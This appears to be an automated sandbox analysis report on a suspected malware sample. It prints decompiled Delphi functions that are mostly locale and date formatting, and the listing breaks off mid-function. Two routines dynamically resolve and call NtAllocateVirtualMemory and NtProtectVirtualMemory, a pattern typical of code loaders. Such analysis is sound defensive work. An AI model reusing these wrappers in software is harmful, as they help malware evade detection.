RegCloseKey.ADVAPI32(?,032A35D4,00000000,?,00000004,00000000,032A35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 032A35C7

Strings

FPUMaskValue, xrefs: 032A35A8
SOFTWARE\Borland\Delphi\RTL, xrefs: 032A3574

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 36b5b13fd61657d21127d3f78647aefcb6e762d8913ca068acffcf18309dc7a3
Instruction ID: 4d39f961339a62c0f5e94f59233f090832149b79d8ea632e95717aab71ad731f
Opcode Fuzzy Hash: 36b5b13fd61657d21127d3f78647aefcb6e762d8913ca068acffcf18309dc7a3
Instruction Fuzzy Hash: 4701B5B9A60B18BFDB11DB989C02BBDB3ECDB08B10F1041A1BB10D6580E6749690C754

Uniqueness

Uniqueness Score: -1.00%

Function 032AAA34 Relevance: 7.6, APIs: 5, Instructions: 50
threadCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E032AAA34(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x32aaacb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E032AA7A8(GetThreadLocale(), 0x32aaae0, 0x100b,  &_v8);
				_t29 = E032A7AEC(0x32aaae0, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E032AA980, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x32dd8f8;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E032AA9BC, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E032AAAD2);
				return E032A44A0( &_v8);
			}

0x032aaa34
0x032aaa37
0x032aaa3c
0x032aaa3d
0x032aaa42
0x032aaa45
0x032aaa5b
0x032aaa6d
0x032aaa77
0x032aaa87
0x032aaa8c
0x032aaa91
0x032aaa96
0x032aaa96
0x032aaa9c
0x032aaa9f
0x032aaa9f
0x032aaab0
0x032aaab0
0x032aaab7
0x032aaaba
0x032aaabd
0x032aaaca

APIs

GetThreadLocale.KERNEL32(?,00000000,032AAACB,?,?,00000000), ref: 032AAA4C

Part of subcall function 032AA7A8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 032AA7C6

GetThreadLocale.KERNEL32(00000000,00000004,00000000,032AAACB,?,?,00000000), ref: 032AAA7C
EnumCalendarInfoA.KERNEL32(Function_0000A980,00000000,00000000,00000004), ref: 032AAA87
GetThreadLocale.KERNEL32(00000000,00000003,00000000,032AAACB,?,?,00000000), ref: 032AAAA5
EnumCalendarInfoA.KERNEL32(Function_0000A9BC,00000000,00000000,00000003), ref: 032AAAB0

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 4e2035aa1eadcc99845a2dc302cc4f6cf7baa74a7e7d00f0c90ab3235ad2742d
Instruction ID: eba3059d20cbf0ce0a3ce1b4a7b94ecb423df648c49d189a5447b69c3087ebad
Opcode Fuzzy Hash: 4e2035aa1eadcc99845a2dc302cc4f6cf7baa74a7e7d00f0c90ab3235ad2742d
Instruction Fuzzy Hash: DD01A739620F547FE312EA7C8D11B5F72ACDF45B20F550560E5219A6C1E7A49E80C664

Uniqueness

Uniqueness Score: -1.00%

Function 032AAAE4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
threadCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E032AAAE4(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t45;
				void* _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				void* _t83;
				void* _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x32aacb4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E032A44A0(__edx);
				E032AA7A8(GetThreadLocale(), 0x32aaccc, 0x1009,  &_v12);
				if(E032A7AEC(0x32aaccc, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						__eflags = _t92 - E032A4760(_t124);
						if(__eflags > 0) {
							goto L28;
						}
						asm("bt [0x32c9808], eax");
						if(__eflags >= 0) {
							_t45 = E032A80A4(_t124 + _t92 - 1, 2, 0x32aacd0);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E032A80A4(_t124 + _t92 - 1, 4, 0x32aace0);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E032A80A4(_t124 + _t92 - 1, 2, 0x32aacf8);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E032A476C(_t122, 0x32aad10);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E032A4688();
												E032A476C(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E032A476C(_t122, 0x32aad04);
										_t92 = _t92 + 1;
									}
								} else {
									E032A476C(_t122, 0x32aacf0);
									_t92 = _t92 + 3;
								}
							} else {
								E032A476C(_t122, 0x32aacdc);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E032ABAC8(_t124, _t92);
							E032A49C4(_t124, _v8, _t92,  &_v20);
							E032A476C(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x32dd8d0; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E032A44F4(_t122, _t124);
					} else {
						while(_t92 <= E032A4760(_t124)) {
							_t83 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E032A4688();
									E032A476C(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E032AACBB);
				return E032A44C4( &_v24, 4);
			}

0x032aaae4
0x032aaae9
0x032aaaea
0x032aaaeb
0x032aaaec
0x032aaaed
0x032aaaf1
0x032aaaf3
0x032aaaf7
0x032aaaf8
0x032aaafd
0x032aab00
0x032aab03
0x032aab0a
0x032aab22
0x032aab3a
0x032aac8a
0x032aac91
0x032aac93
0x00000000
0x00000000
0x032aaba9
0x032aabb0
0x032aabee
0x032aabf3
0x032aabf5
0x032aac17
0x032aac1c
0x032aac1e
0x032aac3f
0x032aac44
0x032aac46
0x032aac5c
0x032aac5c
0x032aac5e
0x032aac64
0x032aac6b
0x032aac60
0x032aac60
0x032aac62
0x032aac7a
0x032aac84
0x00000000
0x00000000
0x00000000
0x032aac62
0x032aac48
0x032aac4f
0x032aac54
0x032aac54
0x032aac20
0x032aac27
0x032aac2c
0x032aac2c
0x032aabf7
0x032aabfe
0x032aac03
0x032aac03
0x032aac89
0x032aac89
0x032aabb2
0x032aabbb
0x032aabc9
0x032aabd3
0x032aabd8
0x032aabd8
0x032aabb0
0x032aab40
0x032aab40
0x032aab45
0x032aab48
0x032aab56
0x032aab52
0x032aab52
0x032aab52
0x032aab5a
0x032aab97
0x032aab5c
0x032aab83
0x032aab63
0x032aab63
0x032aab65
0x032aab67
0x032aab69
0x032aab73
0x032aab7d
0x032aab7d
0x032aab69
0x032aab82
0x032aab82
0x032aab82
0x032aab8e
0x032aab5a
0x032aac99
0x032aac9b
0x032aac9e
0x032aaca1
0x032aacb3

APIs

GetThreadLocale.KERNEL32(?,00000000,032AACB4,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 032AAB13

Part of subcall function 032AA7A8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 032AA7C6

Strings

yyyy, xrefs: 032AAC09
eeee, xrefs: 032AAC22
ggg, xrefs: 032AABF9

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 6bb16a050aa252586ec4ea574822057330cc6941a76f43ac83960829b3ed1540
Instruction ID: 465afbe03ac170aa231f7dcc075902fa96600b3413ed7370a3be8e8bd3b4a30a
Opcode Fuzzy Hash: 6bb16a050aa252586ec4ea574822057330cc6941a76f43ac83960829b3ed1540
Instruction Fuzzy Hash: 4741D138734E458BE711FAAE898027EF3DBEF89300B584862D451CB344D6B9DDC2C661

Uniqueness

Uniqueness Score: -1.00%

Function 032B79BC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E032B79BC(intOrPtr _a4, char _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {

				 *0x32de318 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtAllocateVirtualMemory");
				 *0x32de318(_a4,  &_a8, 0,  &_a12, _a16, _a20);
				return _a8;
			}

0x032b79d4
0x032b79ef
0x032b79f9

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 032B79C9
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032B79CF

Strings

NtAllocateVirtualMemory, xrefs: 032B79BF
C:\Windows\System32\ntdll.dll, xrefs: 032B79C4

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 1646373207-2206134580
Opcode ID: bbc5c5defd98dec96517837e1b58c2c00cc24446ae3bdead4664646ed6377db6
Instruction ID: a78f0cc572f18c08a3e4c5eb902fe0badc55dc97dcb77ffe2c8f270b9072ee80
Opcode Fuzzy Hash: bbc5c5defd98dec96517837e1b58c2c00cc24446ae3bdead4664646ed6377db6
Instruction Fuzzy Hash: 28E01ABA61030DBFDB40EF9CE845EEB37ACAB08B50F008015BA14DB501C770E5908BB4

Uniqueness

Uniqueness Score: -1.00%

Function 032B7A50 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E032B7A50(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {

				 *0x32de31c = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtProtectVirtualMemory");
				 *0x32de31c(_a4, _a8, _a12, _a16, _a20);
				return 1;
			}

0x032b7a68
0x032b7a81
0x032b7a8a

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 032B7A5D
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 032B7A63

Strings

C:\Windows\System32\ntdll.dll, xrefs: 032B7A58
NtProtectVirtualMemory, xrefs: 032B7A53

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
API String ID: 1646373207-1386159242
Opcode ID: d500f457ebf1dc2d66d3b1247c5db855aee7e727a5bba1a7bf014f86a44e149c
Instruction ID: 07bcd92e325241f98bc2d7e5306a8a7420884f8415a43327bb2ab08d013ab69a
Opcode Fuzzy Hash: d500f457ebf1dc2d66d3b1247c5db855aee7e727a5bba1a7bf014f86a44e149c
Instruction Fuzzy Hash: 27E0BFB9610209AFC784EE9CE845D9B37ECAB487407048005BA18DB601C675E5618B74

Uniqueness

Uniqueness Score: -1.00%

Function 032AC458 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E032AC458() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x32c982c = _t1;
				}
				if( *0x32c982c == 0) {
					 *0x32c982c = E032A7FB8;
					return E032A7FB8;
				}
				return _t1;
			}

0x032ac45e
0x032ac463
0x032ac467
0x032ac46f
0x032ac474
0x032ac474
0x032ac480
0x032ac487
0x00000000
0x032ac487
0x032ac48d

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,032C810B,00000000,032C811E), ref: 032AC45E
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 032AC46F

Strings

kernel32.dll, xrefs: 032AC459
GetDiskFreeSpaceExA, xrefs: 032AC469

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 2f283b60b6f5b8104f3ee38c9bdd9d4aca870cabbf4da2d5c9853825ac207c74
Instruction ID: 48bdf8f13bb02679ed0f379780d7f88e7f23c68bbcdbdba4a3efadfd5a85be74
Opcode Fuzzy Hash: 2f283b60b6f5b8104f3ee38c9bdd9d4aca870cabbf4da2d5c9853825ac207c74
Instruction Fuzzy Hash: 62D05E74230F215FDA00EABD74846392598A308704B4881A4E112DB101C7A588C04F9C

Uniqueness

Uniqueness Score: -1.00%

Function 032A9AD0 Relevance: 6.4, Strings: 5, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E032A9AD0(void* __ecx, void* __edx, signed char** __edi, void* __fp0) {
				signed int _t147;
				signed int _t149;
				signed int _t151;
				signed int _t153;
				void* _t171;
				intOrPtr _t212;
				intOrPtr _t215;
				signed char _t220;
				intOrPtr _t258;
				signed char** _t261;
				signed int _t263;
				void* _t264;
				void* _t265;
				void* _t269;

				L0:
				while(1) {
					L0:
					_t269 = __fp0;
					_t261 = __edi;
					E032A9314(_t264);
					_t263 =  *__edi - 1;
					_t265 = E032A80A4(_t263, 5, 0x32a9d7c);
					if(_t265 != 0) {
						_t147 = E032A80A4(_t263, 3, 0x32a9d84);
						__eflags = _t147;
						if(_t147 != 0) {
							_t149 = E032A80A4(_t263, 4, 0x32a9d88);
							__eflags = _t149;
							if(_t149 != 0) {
								_t151 = E032A80A4(_t263, 4, 0x32a9d90);
								__eflags = _t151;
								if(_t151 != 0) {
									_t153 = E032A80A4(_t263, 3, 0x32a9d98);
									__eflags = _t153;
									if(_t153 != 0) {
										E032A9204(1,  *((intOrPtr*)(_t264 + 8)));
									} else {
										E032A92DC(_t264);
										E032A9248( *((intOrPtr*)(0x32dd890 + (E032A91C8(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) + 0xc))) & 0x0000ffff) * 4)),  *((intOrPtr*)(_t264 + 8)));
										 *__edi =  &(( *__edi)[2]);
									}
								} else {
									E032A92DC(_t264);
									E032A9248( *((intOrPtr*)(0x32dd8ac + (E032A91C8(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t264 + 8)) + 0xc))) & 0x0000ffff) * 4)),  *((intOrPtr*)(_t264 + 8)));
									 *__edi =  &(( *__edi)[3]);
								}
							} else {
								__eflags =  *((short*)(_t264 - 0x16)) - 0xc;
								if( *((short*)(_t264 - 0x16)) >= 0xc) {
									_t212 =  *0x32dd828; // 0x9331b68
									E032A9248(_t212,  *((intOrPtr*)(_t264 + 8)));
								} else {
									_t215 =  *0x32dd824; // 0x9331b58
									E032A9248(_t215,  *((intOrPtr*)(_t264 + 8)));
								}
								 *_t261 =  &(( *_t261)[3]);
								 *((char*)(_t264 - 0x1f)) = 1;
							}
						} else {
							__eflags =  *((short*)(_t264 - 0x16)) - 0xc;
							if( *((short*)(_t264 - 0x16)) >= 0xc) {
								__eflags = _t263;
							}
							E032A9204(1,  *((intOrPtr*)(_t264 + 8)));
							 *_t261 =  &(( *_t261)[2]);
							 *((char*)(_t264 - 0x1f)) = 1;
						}
					} else {
						__eflags =  *(__ebp - 0x16) - 0xc;
						if( *(__ebp - 0x16) >= 0xc) {
							__esi = __esi + 3;
							__eflags = __esi;
						}
						__eax =  *(__ebp + 8);
						__edx = 2;
						__eax = __esi;
						__eax = E032A9204(2,  *(__ebp + 8));
						 *__edi =  *__edi + 4;
						 *((char*)(__ebp - 0x1f)) = 1;
					}
					L109:
					while( *( *_t261) != 0) {
						 *(_t264 - 5) =  *( *_t261) & 0x000000ff;
						asm("bt [0x32c9808], eax");
						if(_t265 >= 0) {
							 *_t261 = E032ABAC0( *_t261);
							_t220 =  *(_t264 - 5) & 0x000000ff;
							__eflags = _t220 + 0x9f - 0x1a;
							if(_t220 + 0x9f - 0x1a < 0) {
								_t220 = _t220 - 0x20;
								__eflags = _t220;
							}
							L5:
							__eflags = _t220 + 0xbf - 0x1a;
							if(_t220 + 0xbf - 0x1a >= 0) {
								L10:
								_t171 = (_t220 & 0x000000ff) + 0xffffffde;
								__eflags = _t171 - 0x38;
								if(_t171 > 0x38) {
									L108:
									E032A9204(1,  *((intOrPtr*)(_t264 + 8)));
									continue;
								}
								L11:
								switch( *((intOrPtr*)(( *(_t171 + 0x32a96d0) & 0x000000ff) * 4 +  &M032A9709))) {
									case 0:
										goto L108;
									case 1:
										L12:
										E032A92B0(_t264);
										E032A92DC(_t264);
										__eflags =  *((intOrPtr*)(_t264 - 0xc)) - 2;
										if( *((intOrPtr*)(_t264 - 0xc)) > 2) {
											E032A9264( *(_t264 - 0xe) & 0x0000ffff, 4, _t269,  *((intOrPtr*)(_t264 + 8)));
										} else {
											E032A9264(( *(_t264 - 0xe) & 0x0000ffff) % 0x64, 2, _t269,  *((intOrPtr*)(_t264 + 8)));
										}
										goto L109;
									case 2:
										L15:
										E032A92B0(__ebp) = E032A92DC(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x28;
										 *(__ebp - 0xc) = E032A9354( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
										__eax =  *(__ebp - 0x28);
										__eax = E032A9248( *(__ebp - 0x28),  *(__ebp + 8));
										goto L109;
									case 3:
										L16:
										E032A92B0(__ebp) = E032A92DC(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x2c;
										 *(__ebp - 0xc) = E032A94D0( *(__ebp - 0xc), __ebx, __ebp - 0x2c, __esi, __ebp);
										__eax =  *(__ebp - 0x2c);
										__eax = E032A9248( *(__ebp - 0x2c),  *(__ebp + 8));
										goto L109;
									case 4:
										L17:
										E032A92B0(__ebp) = E032A92DC(__ebp);
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
										if(__eflags < 0) {
											__eax =  *(__ebp + 8);
											__eax =  *(__ebp - 0x10) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E032A9264( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax = 0x32dd830[ *(__ebp - 0x10) & 0x0000ffff];
												__eax = E032A9248(0x32dd830[ *(__ebp - 0x10) & 0x0000ffff],  *(__ebp + 8));
											} else {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax =  *(0x32dd860 + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
												__eax = E032A9248( *(0x32dd860 + ( *(__ebp - 0x10) & 0x0000ffff) * 4),  *(__ebp + 8));
											}
										}
										goto L109;
									case 5:
										L23:
										E032A92B0(__ebp) =  *(__ebp - 0xc);
										__eax =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags = __eax;
										if(__eflags < 0) {
											E032A92DC(__ebp) =  *(__ebp + 8);
											__eax =  *(__ebp - 0x12) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E032A9264( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												E032A91C8(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
												__eax =  *(0x32dd890 + (__ax & 0x0000ffff) * 4);
												__eax = E032A9248( *(0x32dd890 + (__ax & 0x0000ffff) * 4),  *(__ebp + 8));
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eflags == 0) {
													E032A91C8(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
													__eax =  *(0x32dd8ac + (__ax & 0x0000ffff) * 4);
													__eax = E032A9248( *(0x32dd8ac + (__ax & 0x0000ffff) * 4),  *(__ebp + 8));
												} else {
													__eax = __eax - 1;
													__eflags = __eax;
													if(__eax == 0) {
														__eax =  *(__ebp + 8);
														__eax =  *0x32dd818; // 0x9338ed8
														__eax = E032A95E8(__eax, __ebx, __edi, __esi, __fp0,  *(__ebp + 8));
													} else {
														__eax =  *(__ebp + 8);
														__eax =  *0x32dd81c; // 0x932a698
														__eax = E032A95E8(__eax, __ebx, __edi, __esi, __fp0,  *(__ebp + 8));
													}
												}
											}
										}
										goto L109;
									case 6:
										L33:
										E032A92B0(__ebp) = E032A9314(__ebp);
										 *(__ebp - 0x20) = 0;
										__esi =  *__edi;
										while(1) {
											L52:
											__eflags =  *__esi;
											if(__eflags == 0) {
												break;
											}
											L34:
											 *__esi & 0x000000ff = __al & 0x000000ff;
											asm("bt [0x32c9808], eax");
											if(__eflags >= 0) {
												L36:
												__eax =  *__esi & 0x000000ff;
												__eflags = __eax - 0x48;
												if(__eflags > 0) {
													L42:
													__eax = __eax - 0x61;
													__eflags = __eax;
													if(__eax == 0) {
														L45:
														__eflags =  *(__ebp - 0x20);
														if( *(__ebp - 0x20) != 0) {
															L51:
															__esi = __esi + 1;
															__eflags = __esi;
															continue;
														}
														L46:
														__edx = 0x32a9d7c;
														__ecx = 5;
														__eax = __esi;
														__eax = E032A80A4(__esi, 5, 0x32a9d7c);
														__eflags = __eax;
														if(__eax == 0) {
															L49:
															 *((char*)(__ebp - 0x1f)) = 1;
															break;
														}
														L47:
														__edx = 0x32a9d84;
														__ecx = 3;
														__eax = __esi;
														__eax = E032A80A4(__esi, 3, 0x32a9d84);
														__eflags = __eax;
														if(__eax == 0) {
															goto L49;
														}
														L48:
														__edx = 0x32a9d88;
														__ecx = 4;
														__eax = __esi;
														__eax = E032A80A4(__esi, 4, 0x32a9d88);
														__eflags = __eax;
														if(__eax != 0) {
															break;
														}
														goto L49;
													}
													L43:
													__eax = __eax - 7;
													__eflags = __eax;
													if(__eax == 0) {
														break;
													}
													L44:
													goto L51;
												}
												L37:
												if(__eflags == 0) {
													break;
												}
												L38:
												__eax = __eax - 0x22;
												__eflags = __eax;
												if(__eax == 0) {
													L50:
													__eax =  *(__ebp - 0x20) & 0x000000ff;
													__al = __al ^ 0x00000001;
													__eflags = __al;
													 *(__ebp - 0x20) = __al;
													goto L51;
												}
												L39:
												__eax = __eax - 5;
												__eflags = __eax;
												if(__eax == 0) {
													goto L50;
												}
												L40:
												__eax = __eax - 0x1a;
												__eflags = __eax;
												if(__eax == 0) {
													goto L45;
												}
												L41:
												goto L51;
											} else {
												__eax = __esi;
												__esi = E032ABAC0(__esi);
												continue;
											}
										}
										L53:
										__eax =  *(__ebp - 0x16) & 0x0000ffff;
										 *(__ebp - 0x22) = __ax;
										__eflags =  *((char*)(__ebp - 0x1f));
										if( *((char*)(__ebp - 0x1f)) != 0) {
											__eflags =  *(__ebp - 0x22);
											if( *(__ebp - 0x22) != 0) {
												__eflags =  *(__ebp - 0x22) - 0xc;
												if( *(__ebp - 0x22) > 0xc) {
													_t69 = __ebp - 0x22;
													 *_t69 =  *(__ebp - 0x22) - 0xc;
													__eflags =  *_t69;
												}
											} else {
												 *(__ebp - 0x22) = 0xc;
											}
										}
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x22) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E032A9264( *(__ebp - 0x22) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 7:
										L61:
										E032A92B0(__ebp) = E032A9314(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x18) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E032A9264( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 8:
										L64:
										E032A92B0(__ebp) = E032A9314(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E032A9264( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 9:
										L67:
										__eax = E032A92B0(__ebp);
										__eflags =  *(__ebp - 0xc) - 1;
										if( *(__ebp - 0xc) != 1) {
											__eax =  *(__ebp + 8);
											__eax =  *0x32dd830; // 0x932a6b8
											__eax = E032A95E8(__eax, __ebx, __edi, __esi, __fp0,  *(__ebp + 8));
										} else {
											__eax =  *(__ebp + 8);
											__eax =  *0x32dd82c; // 0x9338ef0
											__eax = E032A95E8(__eax, __ebx, __edi, __esi, __fp0,  *(__ebp + 8));
										}
										goto L109;
									case 0xa:
										L70:
